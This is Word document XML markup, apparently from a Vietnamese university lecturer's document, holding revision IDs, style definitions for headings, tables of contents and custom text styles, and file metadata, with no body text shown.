    <w:rsid w:val="009F135D"/>
    <w:rsid w:val="00A03B9B"/>
    <w:rsid w:val="00A8028F"/>
    <w:rsid w:val="00B0789F"/>
    <w:rsid w:val="00B12E64"/>
    <w:rsid w:val="00B369FA"/>
    <w:rsid w:val="00B531B3"/>
    <w:rsid w:val="00BA02B7"/>
    <w:rsid w:val="00BB706A"/>
    <w:rsid w:val="00BC268F"/>
    <w:rsid w:val="00BF02A7"/>
    <w:rsid w:val="00C009DB"/>
    <w:rsid w:val="00CD5834"/>
    <w:rsid w:val="00CF1959"/>
    <w:rsid w:val="00D26F58"/>
    <w:rsid w:val="00D408F1"/>
    <w:rsid w:val="00D81DE8"/>
    <w:rsid w:val="00D83595"/>
    <w:rsid w:val="00D86FF1"/>
    <w:rsid w:val="00DF3C27"/>
    <w:rsid w:val="00E31B06"/>
    <w:rsid w:val="00E63C32"/>
    <w:rsid w:val="00E82AF6"/>
    <w:rsid w:val="00E97CBF"/>
    <w:rsid w:val="00EF7689"/>
    <w:rsid w:val="00F03A82"/>
    <w:rsid w:val="00F334DC"/>
    <w:rsid w:val="00F9409C"/>
    <w:rsid w:val="00FA62FA"/>
    <w:rsid w:val="00FB5FE5"/>
    <w:rsid w:val="00FC2D83"/>
    <w:rsid w:val="036BF589"/>
    <w:rsid w:val="04E5F3C5"/>
    <w:rsid w:val="0A0845CC"/>
    <w:rsid w:val="0F212C11"/>
    <w:rsid w:val="1C952D4C"/>
    <w:rsid w:val="24E794C7"/>
    <w:rsid w:val="2838A144"/>
    <w:rsid w:val="2D366EAB"/>
    <w:rsid w:val="2DC5D576"/>
    <w:rsid w:val="30F9C00D"/>
    <w:rsid w:val="3402E3E9"/>
    <w:rsid w:val="35A679DD"/>
    <w:rsid w:val="37A6B7A0"/>
    <w:rsid w:val="396BACD8"/>
    <w:rsid w:val="3FD6E55A"/>
    <w:rsid w:val="412CC248"/>
    <w:rsid w:val="431FEE7C"/>
    <w:rsid w:val="492045D4"/>
    <w:rsid w:val="4AA4C13E"/>
    <w:rsid w:val="4C3ADA38"/>
    <w:rsid w:val="51B87155"/>
    <w:rsid w:val="558AB511"/>
    <w:rsid w:val="558CA2AC"/>
    <w:rsid w:val="57CBC74E"/>
    <w:rsid w:val="595D94BE"/>
    <w:rsid w:val="5A6E8600"/>
    <w:rsid w:val="5BEC0675"/>
    <w:rsid w:val="5EE694BF"/>
    <w:rsid w:val="5F56FB38"/>
    <w:rsid w:val="5FBE3F65"/>
    <w:rsid w:val="613EC492"/>
    <w:rsid w:val="638299A5"/>
    <w:rsid w:val="63B2D126"/>
    <w:rsid w:val="68508220"/>
    <w:rsid w:val="69C977F9"/>
    <w:rsid w:val="69DCF625"/>
    <w:rsid w:val="6F3106DA"/>
    <w:rsid w:val="7D68F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73CBD1B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7EE809B2-71C5-46A1-A6F0-8F99C18C2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73D"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="atLeast"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009E3993"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36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keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="12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qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="2"/>
      </w:numPr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locked/>
    <w:rsid w:val="009E3993"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:kern w:val="3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locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:b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locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:i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locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000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locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"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locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26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Pr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000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Pr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26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Pr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="261"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="522"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="782"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1040"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1300"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1560"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1820"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="208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Pr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default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  <w:locked/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center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semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="38"/>
      <w:szCs w:val="38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="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light" w:hint="default"/>
      <w:spacing w:val="-10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto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Pr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default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Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="0" w:line="252" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="365F91"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtHoaThi">
    <w:name w:val="_txtHoaThi"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:ind w:left="567" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtCourier">
    <w:name w:val="_txtCourier"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="009E3993"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="567" w:hanging="283"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtHinhVe">
    <w:name w:val="_txtHinhVe"/>
    <w:basedOn w:val="txtHoaThi"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtNoiDung">
    <w:name w:val="_txtNoiDung"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLine="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtGachDong">
    <w:name w:val="_txtGachDong"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="363"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtSource">
    <w:name w:val="_txtSource"/>
    <w:basedOn w:val="txtCourier"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe01">
    <w:name w:val="_txtTieuDe01"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="567" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe02">
    <w:name w:val="_txtTieuDe02"/>
    <w:basedOn w:val="TOCHeading"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe03">
    <w:name w:val="_txtTieuDe03"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="3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xtTaiLieuThamKhao">
    <w:name w:val="_txtTaiLieuThamKhao"/>
    <w:basedOn w:val="txtNoiDung"/>
    <w:qFormat/>
    <w:rsid w:val="00804A96"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:left="567" w:hanging="567"/>
    </w:pPr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04A96"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtCommand">
    <w:name w:val="_txtCommand"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="008A1FD0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style9">
    <w:name w:val="style9"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00621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11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766</Words>
  <Characters>4368</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>36</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop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</dc:title>
  <dc:subject/>
  <dc:creator>Nguyen Tan Khoi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ntkhoi@dut.udn.vn</cp:lastModifiedBy>
  <cp:revision>73</cp:revision>
  <cp:lastPrinted>2024-01-08T02:40:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-05T07:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-26T10:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>